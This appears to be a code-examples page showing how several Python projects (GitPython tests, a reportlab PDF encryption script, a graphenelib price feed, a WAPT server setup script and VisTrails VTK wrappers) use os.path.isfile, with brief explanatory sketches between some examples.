RemoteReference.delete(rw_repo, *refs)
remote_refs_so_far += len(refs)
for ref in refs:
assert ref.remote_name == remote.name
# END for each ref to delete
assert remote_refs_so_far
for remote in remotes:
# remotes without references should produce an empty list
self.assertEqual(remote.refs, [])
# END for each remote
# change where the active head points to
if cur_head.is_detached:
cur_head.reference = rw_repo.heads[0]
head = cur_head.reference
old_commit = head.commit
head.commit = old_commit.parents[0]
assert head.commit == old_commit.parents[0]
assert head.commit == cur_head.commit
head.commit = old_commit
# setting a non-commit as commit fails, but succeeds as object
head_tree = head.commit.tree
self.failUnlessRaises(ValueError, setattr, head, 'commit', head_tree)
assert head.commit == old_commit # and the ref did not change
# we allow heads to point to any object
head.object = head_tree
assert head.object == head_tree
# cannot query tree as commit
self.failUnlessRaises(TypeError, getattr, head, 'commit')
# set the commit directly using the head. This would never detach the head
assert not cur_head.is_detached
head.object = old_commit
cur_head.reference = head.commit
assert cur_head.is_detached
parent_commit = head.commit.parents[0]
assert cur_head.is_detached
cur_head.commit = parent_commit
assert cur_head.is_detached and cur_head.commit == parent_commit
cur_head.reference = head
assert not cur_head.is_detached
cur_head.commit = parent_commit
assert not cur_head.is_detached
assert head.commit == parent_commit
# test checkout
active_branch = rw_repo.active_branch
for head in rw_repo.heads:
checked_out_head = head.checkout()
assert checked_out_head == head
# END for each head to checkout
# checkout with branch creation
new_head = active_branch.checkout(b="new_head")
assert active_branch != rw_repo.active_branch
assert new_head == rw_repo.active_branch
# checkout with force as we have a changed a file
# clear file
open(new_head.commit.tree.blobs[-1].abspath, 'w').close()
assert len(new_head.commit.diff(None))
# create a new branch that is likely to touch the file we changed
far_away_head = rw_repo.create_head("far_head", 'HEAD~100')
self.failUnlessRaises(GitCommandError, far_away_head.checkout)
assert active_branch == active_branch.checkout(force=True)
assert rw_repo.head.reference != far_away_head
# test reference creation
partial_ref = 'sub/ref'
full_ref = 'refs/%s' % partial_ref
ref = Reference.create(rw_repo, partial_ref)
assert ref.path == full_ref
assert ref.object == rw_repo.head.commit
self.failUnlessRaises(OSError, Reference.create, rw_repo, full_ref, 'HEAD~20')
# it works if it is at the same spot though and points to the same reference
assert Reference.create(rw_repo, full_ref, 'HEAD').path == full_ref
Reference.delete(rw_repo, full_ref)
# recreate the reference using a full_ref
ref = Reference.create(rw_repo, full_ref)
assert ref.path == full_ref
assert ref.object == rw_repo.head.commit
# recreate using force
ref = Reference.create(rw_repo, partial_ref, 'HEAD~1', force=True)
assert ref.path == full_ref
assert ref.object == rw_repo.head.commit.parents[0]
# rename it
orig_obj = ref.object
for name in ('refs/absname', 'rela_name', 'feature/rela_name'):
ref_new_name = ref.rename(name)
assert isinstance(ref_new_name, Reference)
assert name in ref_new_name.path
assert ref_new_name.object == orig_obj
assert ref_new_name == ref
# END for each name type
# References that don't exist trigger an error if we want to access them
self.failUnlessRaises(ValueError, getattr, Reference(rw_repo, "refs/doesntexist"), 'commit')
# exists, fail unless we force
ex_ref_path = far_away_head.path
self.failUnlessRaises(OSError, ref.rename, ex_ref_path)
# if it points to the same commit it works
far_away_head.commit = ref.commit
ref.rename(ex_ref_path)
assert ref.path == ex_ref_path and ref.object == orig_obj
assert ref.rename(ref.path).path == ex_ref_path # rename to same name
# create symbolic refs
symref_path = "symrefs/sym"
symref = SymbolicReference.create(rw_repo, symref_path, cur_head.reference)
assert symref.path == symref_path
assert symref.reference == cur_head.reference
self.failUnlessRaises(OSError, SymbolicReference.create, rw_repo, symref_path, cur_head.reference.commit)
# it works if the new ref points to the same reference
SymbolicReference.create(rw_repo, symref.path, symref.reference).path == symref.path # @NoEffect
SymbolicReference.delete(rw_repo, symref)
# would raise if the symref had not been deleted
symref = SymbolicReference.create(rw_repo, symref_path, cur_head.reference)
# test symbolic references which are not at default locations like HEAD
# or FETCH_HEAD - they may also be at spots in refs of course
symbol_ref_path = "refs/symbol_ref"
symref = SymbolicReference(rw_repo, symbol_ref_path)
assert symref.path == symbol_ref_path
symbol_ref_abspath = osp.join(rw_repo.git_dir, symref.path)
# set it
symref.reference = new_head
assert symref.reference == new_head
assert osp.isfile(symbol_ref_abspath)
assert symref.commit == new_head.commit
for name in ('absname', 'folder/rela_name'):
symref_new_name = symref.rename(name)
assert isinstance(symref_new_name, SymbolicReference)
assert name in symref_new_name.path
assert symref_new_name.reference == new_head
assert symref_new_name == symref
assert not symref.is_detached
# END for each ref
# create a new non-head ref just to be sure we handle it even if packed
Reference.create(rw_repo, full_ref)
# test ref listing - assure we have packed refs
rw_repo.git.pack_refs(all=True, prune=True)
heads = rw_repo.heads
assert heads
assert new_head in heads
assert active_branch in heads
assert rw_repo.tags
# we should be able to iterate all symbolic refs as well - in that case
# we should expect only symbolic references to be returned
for symref in SymbolicReference.iter_items(rw_repo):
assert not symref.is_detached
# when iterating references, we can get references and symrefs
# when deleting all refs, I'd expect them to be gone ! Even from
# the packed ones
# For this to work, we must not be on any branch
rw_repo.head.reference = rw_repo.head.commit
deleted_refs = set()
for ref in Reference.iter_items(rw_repo):
if ref.is_detached:
ref.delete(rw_repo, ref)
deleted_refs.add(ref)
# END delete ref
# END for each ref to iterate and to delete
assert deleted_refs
for ref in Reference.iter_items(rw_repo):
if ref.is_detached:
assert ref not in deleted_refs
# END for each ref
# reattach head - head will not be returned if it is not a symbolic
# ref
rw_repo.head.reference = Head.create(rw_repo, "master")
# At least the head should still exist
assert osp.isfile(osp.join(rw_repo.git_dir, 'HEAD'))
refs = list(SymbolicReference.iter_items(rw_repo))
assert len(refs) == 1
# test creation of new refs from scratch
for path in ("basename", "dir/somename", "dir2/subdir/basename"):
# REFERENCES
############
fpath = Reference.to_full_path(path)
ref_fp = Reference.from_path(rw_repo, fpath)
assert not ref_fp.is_valid()
ref = Reference(rw_repo, fpath)
assert ref == ref_fp
# can be created by assigning a commit
ref.commit = rw_repo.head.commit
assert ref.is_valid()
# if the assignment raises, the ref doesn't exist
Reference.delete(ref.repo, ref.path)
assert not ref.is_valid()
self.failUnlessRaises(ValueError, setattr, ref, 'commit', "nonsense")
assert not ref.is_valid()
# I am sure I had my reason to make it a class method at first, but
# now it doesn't make so much sense anymore, want an instance method as well
# See http://byronimo.lighthouseapp.com/projects/51787-gitpython/tickets/27
Reference.delete(ref.repo, ref.path)
assert not ref.is_valid()
ref.object = rw_repo.head.commit
assert ref.is_valid()
Reference.delete(ref.repo, ref.path)
assert not ref.is_valid()
self.failUnlessRaises(ValueError, setattr, ref, 'object', "nonsense")
assert not ref.is_valid()
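The osp.isfile assertions in this test bracket the life of the reflog: the file exists right after the head is created and disappears once it is deleted. A tiny stand-alone sketch of that existence check (the temporary 'HEAD.log' path is purely illustrative):

import os
import tempfile

logfile = os.path.join(tempfile.mkdtemp(), 'HEAD.log')
open(logfile, 'w').close()
assert os.path.isfile(logfile)       # present after creation
os.remove(logfile)
assert not os.path.isfile(logfile)   # gone after deletion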
0
Example 94
def scriptInterp():
sys_argv = sys.argv[:] # copy
usage = """PDFENCRYPT USAGE:
PdfEncrypt encrypts your PDF files.
Line mode usage:
% pdfencrypt.exe pdffile [-o ownerpassword] | [owner ownerpassword],
\t[-u userpassword] | [user userpassword],
\t[-p 1|0] | [printable 1|0],
\t[-m 1|0] | [modifiable 1|0],
\t[-c 1|0] | [copypastable 1|0],
\t[-a 1|0] | [annotatable 1|0],
\t[-s savefilename] | [savefile savefilename],
\t[-v 1|0] | [verbose 1|0],
\t[-e128], [encrypt128],
\t[-h] | [help]
-o or owner set the owner password.
-u or user set the user password.
-p or printable set the printable attribute (must be 1 or 0).
-m or modifiable sets the modifiable attribute (must be 1 or 0).
-c or copypastable sets the copypastable attribute (must be 1 or 0).
-a or annotatable sets the annotatable attribute (must be 1 or 0).
-s or savefile sets the name for the output PDF file
-v or verbose prints useful output to the screen.
(this defaults to 'pdffile_encrypted.pdf').
'-e128' or 'encrypt128' allows you to use 128 bit encryption (in beta).
-h or help prints this message.
See PdfEncryptIntro.pdf for more information.
"""
known_modes = ['-o', 'owner',
'-u', 'user',
'-p', 'printable',
'-m', 'modifiable',
'-c', 'copypastable',
'-a', 'annotatable',
'-s', 'savefile',
'-v', 'verbose',
'-h', 'help',
'-e128', 'encrypt128']
OWNER = ''
USER = ''
PRINTABLE = 1
MODIFIABLE = 1
COPYPASTABLE = 1
ANNOTATABLE = 1
SAVEFILE = 'encrypted.pdf'
#try:
caller = sys_argv[0] # may be required later - eg if called by security.py
argv = list(sys_argv)[1:]
if len(argv)>0:
if argv[0] == '-h' or argv[0] == 'help':
print(usage)
return
if len(argv)<2:
raise ValueError("Must include a filename and one or more arguments!")
if argv[0] not in known_modes:
infile = argv[0]
argv = argv[1:]
if not os.path.isfile(infile):
raise ValueError("Can't open input file '%s'!" % infile)
else:
raise ValueError("First argument must be name of the PDF input file!")
# meaningful name at this stage
STRENGTH = 40
if 'encrypt128' in argv:
STRENGTH = 128
argv.remove('encrypt128')
if '-e128' in argv:
STRENGTH = 128
argv.remove('-e128')
if ('-v' in argv) or ('verbose' in argv):
if '-v' in argv:
pos = argv.index('-v')
arg = "-v"
elif 'verbose' in argv:
pos = argv.index('verbose')
arg = "verbose"
try:
verbose = int(argv[pos+1])
except:
verbose = 1
argv.remove(argv[pos+1])
argv.remove(arg)
else:
from reportlab.rl_config import verbose
#argument, valid license variable, invalid license variable, text for print
arglist = (('-o', 'OWNER', OWNER, 'Owner password'),
('owner', 'OWNER', OWNER, 'Owner password'),
('-u', 'USER', USER, 'User password'),
('user', 'USER', USER, 'User password'),
('-p', 'PRINTABLE', PRINTABLE, "'Printable'"),
('printable', 'PRINTABLE', PRINTABLE, "'Printable'"),
('-m', 'MODIFIABLE', MODIFIABLE, "'Modifiable'"),
('modifiable', 'MODIFIABLE', MODIFIABLE, "'Modifiable'"),
('-c', 'COPYPASTABLE', COPYPASTABLE, "'Copypastable'"),
('copypastable', 'COPYPASTABLE', COPYPASTABLE, "'Copypastable'"),
('-a', 'ANNOTATABLE', ANNOTATABLE, "'Annotatable'"),
('annotatable', 'ANNOTATABLE', ANNOTATABLE, "'Annotatable'"),
('-s', 'SAVEFILE', SAVEFILE, "Output file"),
('savefile', 'SAVEFILE', SAVEFILE, "Output file"),
)
binaryrequired = ('-p', 'printable', '-m', 'modifiable', 'copypastable', '-c', 'annotatable', '-a')
for thisarg in arglist:
if thisarg[0] in argv:
pos = argv.index(thisarg[0])
if thisarg[0] in binaryrequired:
if argv[pos+1] not in ('1', '0'):
raise ValueError("%s value must be either '1' or '0'!" % thisarg[1])
try:
if argv[pos+1] not in known_modes:
if thisarg[0] in binaryrequired:
exec(thisarg[1] +' = int(argv[pos+1])')
else:
exec(thisarg[1] +' = argv[pos+1]')
if verbose:
print("%s set to: '%s'." % (thisarg[3], argv[pos+1]))
argv.remove(argv[pos+1])
argv.remove(thisarg[0])
except:
raise "Unable to set %s." % thisarg[3]
if verbose>4:
#useful if feeling paranoid and need to double check things at this point...
print("\ninfile:", infile)
print("STRENGTH:", STRENGTH)
print("SAVEFILE:", SAVEFILE)
print("USER:", USER)
print("OWNER:", OWNER)
print("PRINTABLE:", PRINTABLE)
print("MODIFIABLE:", MODIFIABLE)
print("COPYPASTABLE:", COPYPASTABLE)
print("ANNOTATABLE:", ANNOTATABLE)
print("SAVEFILE:", SAVEFILE)
print("VERBOSE:", verbose)
if SAVEFILE == 'encrypted.pdf':
if infile[-4:] == '.pdf' or infile[-4:] == '.PDF':
tinfile = infile[:-4]
else:
tinfile = infile
SAVEFILE = tinfile+"_encrypted.pdf"
filesize = encryptPdfOnDisk(infile, SAVEFILE, USER, OWNER,
PRINTABLE, MODIFIABLE, COPYPASTABLE, ANNOTATABLE,
strength=STRENGTH)
if verbose:
print("wrote output file '%s'(%s bytes)\n owner password is '%s'\n user password is '%s'" % (SAVEFILE, filesize, OWNER, USER))
if len(argv)>0:
raise ValueError("\nUnrecognised arguments : %s\nknown arguments are:\n%s" % (str(argv)[1:-1], known_modes))
else:
print(usage)
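The argument handling above treats the first positional argument as the input PDF and refuses to continue if it does not name an existing file. A minimal sketch of that validation step (parse_infile is an illustrative name, not part of reportlab):

import os
import sys

def parse_infile(argv):
    # The first positional argument must name an existing input file.
    if not argv:
        raise ValueError('Must include a filename and one or more arguments!')
    infile = argv[0]
    if not os.path.isfile(infile):
        raise ValueError("Can't open input file '%s'!" % infile)
    return infile

if __name__ == '__main__':
    print(parse_infile(sys.argv[1:]))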
0
Example 95
Project: python-graphenelib Source File: pricefeeds.py
def update_price_feed() :
global derived_prices, config
state = {}
for asset in _all_assets + [core_symbol]:
price_median_blockchain[asset] = 0.0
lastUpdate[asset] = datetime.utcnow()
myCurrentFeed[asset] = {}
if configFile.blame != "latest" :
blameFile = config.configPath + "/blame/" + configFile.blame + ".json"
if os.path.isfile(blameFile) :
# Load data from disk for (faster) debugging and verification
with open(blameFile, 'r') as fp:
state = json.load(fp)
# Load feed sources
feed = state["feed"]
# Load configuration from old state
configStruct = state["config"]
for key in configStruct :
# Skip asset config
if key == "asset_config" :
continue
config.__dict__[key] = configStruct[key]
else :
sys.exit("Configuration error: Either set 'blame' to an existing " +
"block number from the blame/ to verify or set it to " +
"'latest' to run the script online! ")
else :
# Load configuration from file
config = configFile
# Get prices online from sources
pool = futures.ThreadPoolExecutor(max_workers=8)
feed = {}
mythreads = {}
for name in config.feedSources :
print("(%s)" % name, end="", flush=True)
mythreads[name] = pool.submit(config.feedSources[name].fetch)
for name in config.feedSources :
print(".", end="", flush=True)
feed[name] = mythreads[name].result()
# rpc variables about bts rpc ##############################################
rpc = GrapheneAPI(config.host, config.port, config.user, config.passwd)
fetch_from_wallet(rpc)
# Determine bts price ######################################################
derived_prices = derive_prices(feed)
# Only publish given feeds #################################################
price_feeds = {}
update_required = False
for asset in asset_list_publish :
# Get Final Price according to price metric
this_asset_config = config.asset_config[asset] if asset in config.asset_config else config.asset_config["default"]
price_metric = this_asset_config["metric"] if "metric" in this_asset_config else config.asset_config["default"]["metric"]
if (asset not in derived_prices or
core_symbol not in derived_prices[asset] or
price_metric not in derived_prices[asset][core_symbol]) :
print("Warning: Asset %s has no derived price!" % asset)
continue
if float(derived_prices[asset][core_symbol][price_metric]) > 0.0:
quote_precision_core = assets[asset]["precision"]
symbol = assets[asset]["symbol"]
assert symbol is not asset
base_precision_cer = assets[blockchain_feed_quote[asset]]["precision"] # core asset
core_price_cer = derived_prices[asset][core_symbol][price_metric] * 10 ** (quote_precision_core - base_precision_cer)
core_price_cer = fractions.Fraction.from_float(core_price_cer).limit_denominator(100000)
denominator_cer = core_price_cer.denominator
numerator_cer = core_price_cer.numerator
quote_precision_settle = assets[asset]["precision"]
symbol = assets[asset]["symbol"]
assert symbol is not asset
base_precision_settle = assets[blockchain_feed_quote[asset]]["precision"] # core asset
core_price_settle = derived_prices[asset]["short_backing_asset"][price_metric] * 10 ** (quote_precision_settle - base_precision_settle)
core_price_settle = fractions.Fraction.from_float(core_price_settle).limit_denominator(100000)
denominator_settle = core_price_settle.denominator
numerator_settle = core_price_settle.numerator
price_feed = {"settlement_price": {
"quote": {"asset_id": assets[blockchain_feed_quote[asset]]["id"],
"amount": denominator_settle
},
"base": {"asset_id": assets[asset]["id"],
"amount": numerator_settle
}
},
"maintenance_collateral_ratio" :
config.asset_config[symbol]["maintenance_collateral_ratio"]
if (symbol in config.asset_config and "maintenance_collateral_ratio" in config.asset_config[symbol])
else config.asset_config["default"]["maintenance_collateral_ratio"],
"maximum_short_squeeze_ratio" :
config.asset_config[symbol]["maximum_short_squeeze_ratio"]
if (symbol in config.asset_config and "maximum_short_squeeze_ratio" in config.asset_config[symbol])
else config.asset_config["default"]["maximum_short_squeeze_ratio"],
"core_exchange_rate": {
"quote": {"asset_id": "1.3.0",
"amount": int(denominator_cer * (
config.asset_config[symbol]["core_exchange_factor"]
if (symbol in config.asset_config and "core_exchange_factor" in config.asset_config[symbol])
else config.asset_config["default"]["core_exchange_factor"]))
},
"base": {"asset_id": assets[asset]["id"],
"amount": numerator_cer
}}}
asset_update_required = publish_rule(rpc, asset)
if asset_update_required :
update_required = True
price_feeds[symbol] = {"asset_id": assets[asset]["id"],
"feed": price_feed,
"publish": asset_update_required
}
else :
print("Warning: Asset %s has a negative derived price of %f (%s metric)!" % (asset, float(derived_prices[asset][price_metric]), price_metric))
continue
if not debug :
# Print some stats ##########################################################
print_stats(price_feeds)
# Verify results or store them ##############################################
configStruct = {}
for key in dir(config) :
if key[0] == "_" :
continue
if key == "feedSources" :
continue
if key == "feedsources" :
continue
if key == "subprocess" :
continue
if key == "os" :
continue
configStruct[key] = config.__dict__[key]
# Store State
state["feed"] = feed
state["derived_prices"] = derived_prices
state["price_feeds"] = price_feeds
state["lastblock"] = get_last_block(rpc)
state["config"] = configStruct
blameFile = config.configPath + "/blame/" + str(state["lastblock"]) + ".json"
with open(blameFile, 'w') as fp:
json.dump(state, fp)
print("Blamefile: " + blameFile)
# Check publish rules and publish feeds #####################################
if update_required and not debug :
publish = False
if config.ask_confirmation :
if rpc._confirm("Are you SURE you would like to publish this feed?") :
publish = True
else :
publish = True
if publish :
print("Update required! Forcing now!")
update_feed(rpc, price_feeds)
else :
print("no update required")
else :
# Verify results
print()
print("[Warning] This script is loading old data for debugging. No price can be published.\n" +
" Please set 'blame' to 'latest' if you are ready to go online!")
print()
compare_feeds(state["derived_prices"], derived_prices)
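The blame-file branch is a replay mechanism: if a stored JSON state exists for the requested block, it is loaded from disk instead of fetching live feeds. A minimal sketch of that load-or-store step, assuming a hypothetical compute_state callable:

import os
import json

def load_state(blame_file, compute_state):
    # Replay a previously stored run when the blame file is on disk.
    if os.path.isfile(blame_file):
        with open(blame_file, 'r') as fp:
            return json.load(fp)
    # Otherwise compute a fresh state and store it for later verification.
    state = compute_state()
    with open(blame_file, 'w') as fp:
        json.dump(state, fp)
    return state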
0
Example 96
Project: WAPT Source File: postconf.py
def main():
if postconf.yesno("Do you want to launch post configuration tool ?") != postconf.DIALOG_OK:
print "canceling wapt postconfiguration"
sys.exit(1)
if type_redhat():
if re.match('^SELinux status:.*enabled', subprocess.check_output('sestatus')):
postconf.msgbox('SELinux detected, tweaking httpd permissions.')
subprocess.check_call(['setsebool', '-P', 'httpd_can_network_connect', '1'])
postconf.msgbox('SELinux correctly configured for Apache reverse proxy')
if not os.path.isfile('/opt/wapt/conf/waptserver.ini'):
shutil.copyfile('/opt/wapt/waptserver/waptserver.ini.template','/opt/wapt/conf/waptserver.ini')
waptserver_ini = iniparse.RawConfigParser()
waptserver_ini.readfp(file('/opt/wapt/conf/waptserver.ini', 'rU'))
# no trailing slash
if type_debian():
wapt_folder = '/var/www/wapt'
elif type_redhat():
wapt_folder = '/var/www/html/wapt'
waptserver_ini.set('uwsgi','gid','httpd')
else:
print ('distrib not supported')
sys.exit(1)
if os.path.isdir(wapt_folder):
waptserver_ini.set('options','wapt_folder',wapt_folder)
else:
# for install on windows
# keep in sync with waptserver.py
wapt_folder = os.path.join(wapt_root_dir,'waptserver','repository','wapt')
if os.path.exists(os.path.join(wapt_root_dir, 'waptserver', 'wsus.py')):
waptserver_ini.set('uwsgi', 'attach-daemon', '/usr/bin/python /opt/wapt/waptserver/wapthuey.py wsus.huey')
if not waptserver_ini.has_option('options', 'wapt_password') or \
not waptserver_ini.get('options', 'wapt_password') or \
postconf.yesno("Do you want to reset admin password ?",yes_label='skip',no_label='reset') != postconf.DIALOG_OK:
wapt_password_ok = False
while not wapt_password_ok:
wapt_password = ''
wapt_password_check = ''
while wapt_password == '':
(code,wapt_password) = postconf.passwordbox("Please enter the wapt server password: ", insecure=True)
if code != postconf.DIALOG_OK:
exit(0)
while wapt_password_check == '':
(code,wapt_password_check) = postconf.passwordbox("Please enter the wapt server password again: ", insecure=True)
if code != postconf.DIALOG_OK:
exit(0)
if wapt_password != wapt_password_check:
postconf.msgbox('Password mismatch!')
else:
wapt_password_ok = True
password = hashlib.sha1(wapt_password).hexdigest()
waptserver_ini.set('options','wapt_password',password)
if not waptserver_ini.has_option('options', 'server_uuid'):
waptserver_ini.set('options', 'server_uuid', str(uuid.uuid1()))
with open('/opt/wapt/conf/waptserver.ini','w') as inifile:
subprocess.check_output("/bin/chmod 640 /opt/wapt/conf/waptserver.ini",shell=True)
subprocess.check_output("/bin/chown wapt /opt/wapt/conf/waptserver.ini",shell=True)
waptserver_ini.write(inifile)
final_msg = [
'Postconfiguration completed.',
]
enable_mongod()
enable_waptserver()
start_mongod()
start_waptserver()
reply = postconf.yesno("Do you want to configure apache?")
if reply == postconf.DIALOG_OK:
try:
fqdn = socket.getfqdn()
if not fqdn:
fqdn = 'wapt'
if '.' not in fqdn:
fqdn += '.lan'
msg = 'FQDN for the WAPT server (eg. wapt.acme.com)'
(code, reply) = postconf.inputbox(text=msg, width=len(msg)+4, init=fqdn)
if code != postconf.DIALOG_OK:
exit(1)
else:
fqdn = reply
# cleanup of old naming convention for the wapt vhost definition
if type_debian():
if os.path.exists('/etc/apache2/sites-enabled/wapt'):
try:
os.unlink('/etc/apache2/sites-enabled/wapt')
except Exception:
pass
if os.path.exists('/etc/apache2/sites-available/wapt'):
try:
os.unlink('/etc/apache2/sites-available/wapt')
except Exception:
pass
make_httpd_config(wapt_folder, '/opt/wapt/waptserver', fqdn)
final_msg.append('Please connect to https://' + fqdn + '/ to access the server.')
if type_debian():
enable_debian_vhost()
elif type_redhat():
enable_redhat_vhost()
reply = postconf.yesno("The Apache config has been reloaded. Do you want to force-restart Apache?")
if reply == postconf.DIALOG_OK:
start_apache()
enable_apache()
start_apache()
setup_firewall()
except subprocess.CalledProcessError as cpe:
final_msg += [
'Error while trying to configure Apache!',
'errno = ' + str(cpe.returncode) + ', output: ' + cpe.output
]
except Exception as e:
import traceback
final_msg += [
'Error while trying to configure Apache!',
traceback.format_exc()
]
width = 4 + max(10, len(max(final_msg, key=len)))
height = 2 + max(20, len(final_msg))
postconf.msgbox('\n'.join(final_msg), height=height, width=width)
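The waptserver.ini handling shows a common first-run idiom: seed the configuration from its template only when the target file does not yet exist, so an existing configuration is never overwritten. A minimal sketch of that idiom (ensure_config and the paths are illustrative):

import os
import shutil

def ensure_config(target, template):
    # Copy the template only on first run; never clobber an existing file.
    if not os.path.isfile(target):
        shutil.copyfile(template, target)
    return target

# Example usage with hypothetical paths.
ensure_config('/opt/example/conf/server.ini', '/opt/example/server.ini.template')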
0
Example 97
Project: VisTrails Source File: init.py
def class_dict(base_module, node):
"""class_dict(base_module, node) -> dict
Returns the class dictionary for the module represented by node and
with base class base_module"""
class_dict_ = {}
def update_dict(name, callable_):
if class_dict_.has_key(name):
class_dict_[name] = callable_(class_dict_[name])
elif hasattr(base_module, name):
class_dict_[name] = callable_(getattr(base_module, name))
else:
class_dict_[name] = callable_(None)
def guarded_SimpleScalarTree_wrap_compute(old_compute):
# This builds the scalar tree and makes it cacheable
def compute(self):
self.is_cacheable = lambda *args, **kwargs: True
old_compute(self)
self.vtkInstance.BuildTree()
return compute
def guarded_SetFileName_wrap_compute(old_compute):
# This checks for the presence of file in VTK readers
def compute(self):
# Skips the check if it's a vtkImageReader or vtkPLOT3DReader, because
# it has other ways of specifying files, like SetFilePrefix for
# multiple files
if any(issubclass(self.vtkClass, x)
for x in
[vtksnl.vtkBYUReader,
vtksnl.vtkImageReader,
vtksnl.vtkPLOT3DReader,
vtksnl.vtkDICOMImageReader,
vtksnl.vtkTIFFReader]):
old_compute(self)
return
if self.has_input('SetFileName'):
name = self.get_input('SetFileName')
elif self.has_input('SetFile'):
name = self.get_input('SetFile').name
else:
raise ModuleError(self, 'Missing filename')
if not os.path.isfile(name):
raise ModuleError(self, 'File does not exist')
old_compute(self)
return compute
def compute_SetDiffuseColorWidget(old_compute):
if old_compute != None:
return old_compute
def call_SetDiffuseColorWidget(self, color):
self.vtkInstance.SetDiffuseColor(color.tuple)
return call_SetDiffuseColorWidget
def compute_SetAmbientColorWidget(old_compute):
if old_compute != None:
return old_compute
def call_SetAmbientColorWidget(self, color):
self.vtkInstance.SetAmbientColor(color.tuple)
return call_SetAmbientColorWidget
def compute_SetSpecularColorWidget(old_compute):
if old_compute != None:
return old_compute
def call_SetSpecularColorWidget(self, color):
self.vtkInstance.SetSpecularColor(color.tuple)
return call_SetSpecularColorWidget
def compute_SetColorWidget(old_compute):
if old_compute != None:
return old_compute
def call_SetColorWidget(self, color):
self.vtkInstance.SetColor(color.tuple)
return call_SetColorWidget
def compute_SetEdgeColorWidget(old_compute):
if old_compute != None:
return old_compute
def call_SetEdgeColorWidget(self, color):
self.vtkInstance.SetEdgeColor(color.tuple)
return call_SetEdgeColorWidget
def compute_SetBackgroundWidget(old_compute):
if old_compute != None:
return old_compute
def call_SetBackgroundWidget(self, color):
self.vtkInstance.SetBackground(color.tuple)
return call_SetBackgroundWidget
def compute_SetBackground2Widget(old_compute):
if old_compute != None:
return old_compute
def call_SetBackground2Widget(self, color):
self.vtkInstance.SetBackground2(color.tuple)
return call_SetBackground2Widget
def compute_SetVTKCell(old_compute):
if old_compute != None:
return old_compute
def call_SetRenderWindow(self, cellObj):
if cellObj.cellWidget:
self.vtkInstance.SetRenderWindow(cellObj.cellWidget.mRenWin)
return call_SetRenderWindow
def compute_SetTransferFunction(old_compute):
# This sets the transfer function
if old_compute != None:
return old_compute
def call_SetTransferFunction(self, tf):
tf.set_on_vtk_volume_property(self.vtkInstance)
return call_SetTransferFunction
def compute_SetPointData(old_compute):
if old_compute != None:
return old_compute
def call_SetPointData(self, pd):
self.vtkInstance.GetPointData().ShallowCopy(pd)
return call_SetPointData
def compute_SetCellData(old_compute):
if old_compute != None:
return old_compute
def call_SetCellData(self, cd):
self.vtkInstance.GetCellData().ShallowCopy(cd)
return call_SetCellData
def compute_SetPointIds(old_compute):
if old_compute != None:
return old_compute
def call_SetPointIds(self, point_ids):
self.vtkInstance.GetPointIds().SetNumberOfIds(point_ids.GetNumberOfIds())
for i in xrange(point_ids.GetNumberOfIds()):
self.vtkInstance.GetPointIds().SetId(i, point_ids.GetId(i))
return call_SetPointIds
def guarded_Writer_wrap_compute(old_compute):
# The behavior for vtkWriter subclasses is to call Write()
# If the user sets a name, we will create a file with that name
# If not, we will create a temporary file from the file pool
def compute(self):
old_compute(self)
fn = self.vtkInstance.GetFileName()
if not fn:
o = self.interpreter.filePool.create_file(suffix='.vtk')
self.vtkInstance.SetFileName(o.name)
else:
o = File()
o.name = fn
self.vtkInstance.Write()
self.set_output('file', o)
return compute
for var in dir(node.klass):
# Every class that has a Set.*FileName method should get a Set.*File port too
if set_file_name_pattern.match(var):
def get_compute_SetFile(method_name):
def compute_SetFile(old_compute):
if old_compute is not None:
return old_compute
def call_SetFile(self, file_obj):
getattr(self.vtkInstance, method_name)(file_obj.name)
return call_SetFile
return compute_SetFile
update_dict('_special_input_function_' + var[:-4],
get_compute_SetFile(var))
if hasattr(node.klass, 'SetFileName'):
# ... BUT we only want to check that filenames exist for readers.
# VTK is nice enough to be consistent with naming, but this is
# brittle.
if node.klass.__name__.endswith('Reader'):
if not node.klass.__name__.endswith('TiffReader'):
update_dict('compute', guarded_SetFileName_wrap_compute)
if hasattr(node.klass, 'SetRenderWindow'):
update_dict('_special_input_function_SetVTKCell',
compute_SetVTKCell)
# Color GUI wrapping
if hasattr(node.klass, 'SetDiffuseColor'):
update_dict('_special_input_function_SetDiffuseColorWidget',
compute_SetDiffuseColorWidget)
if hasattr(node.klass, 'SetAmbientColor'):
update_dict('_special_input_function_SetAmbientColorWidget',
compute_SetAmbientColorWidget)
if hasattr(node.klass, 'SetSpecularColor'):
update_dict('_special_input_function_SetSpecularColorWidget',
compute_SetSpecularColorWidget)
if hasattr(node.klass, 'SetEdgeColor'):
update_dict('_special_input_function_SetEdgeColorWidget',
compute_SetEdgeColorWidget)
if hasattr(node.klass, 'SetColor'):
update_dict('_special_input_function_SetColorWidget',
compute_SetColorWidget)
if (issubclass(node.klass, vtksnl.vtkRenderer) and
hasattr(node.klass, 'SetBackground')):
update_dict('_special_input_function_SetBackgroundWidget',
compute_SetBackgroundWidget)
if (issubclass(node.klass, vtksnl.vtkRenderer) and
hasattr(node.klass, 'SetBackground2')):
update_dict('_special_input_function_SetBackground2Widget',
compute_SetBackground2Widget)
if issubclass(node.klass, vtksnl.vtkWriter):
update_dict('compute', guarded_Writer_wrap_compute)
if issubclass(node.klass, vtksnl.vtkScalarTree):
update_dict('compute', guarded_SimpleScalarTree_wrap_compute)
if issubclass(node.klass, vtksnl.vtkVolumeProperty):
update_dict('_special_input_function_SetTransferFunction',
compute_SetTransferFunction)
if issubclass(node.klass, vtksnl.vtkDataSet):
update_dict('_special_input_function_SetPointData',
compute_SetPointData)
update_dict('_special_input_function_SetCellData',
compute_SetCellData)
if issubclass(node.klass, vtksnl.vtkCell):
update_dict('_special_input_function_SetPointIds',
compute_SetPointIds)
return class_dict_
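
The wrappers above guard a reader's compute() with os.path.isfile so that a missing input file fails early with a clear error. Below is a minimal, standalone sketch of that guard pattern; the attribute name and the exceptions are hypothetical stand-ins for the module's port lookup and ModuleError machinery, not part of the package above.

import os

def guarded_compute(old_compute):
    # Wrap a compute-style method so it verifies its filename input
    # before delegating to the original implementation.
    def compute(self):
        name = getattr(self, 'filename', None)  # hypothetical attribute
        if not name:
            raise ValueError('Missing filename')
        if not os.path.isfile(name):
            raise ValueError("File does not exist: '%s'" % name)
        return old_compute(self)
    return compute
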
0
Example 98
def __init__(self, templatefile, output=None, avs=None, trims=None,
kframes=None, uid=None, label=None, ifps=None, clip=None,
idr=False):
try:
import configparser
except ImportError:
import ConfigParser as configparser
from io import open
# Init config
config = configparser.ConfigParser()
template = open(templatefile, encoding='utf-8')
# Read template
config.readfp(template)
template.close()
# Template defaults
self = self.Template()
self.editions = []
self.uid = uid if uid else self.uid
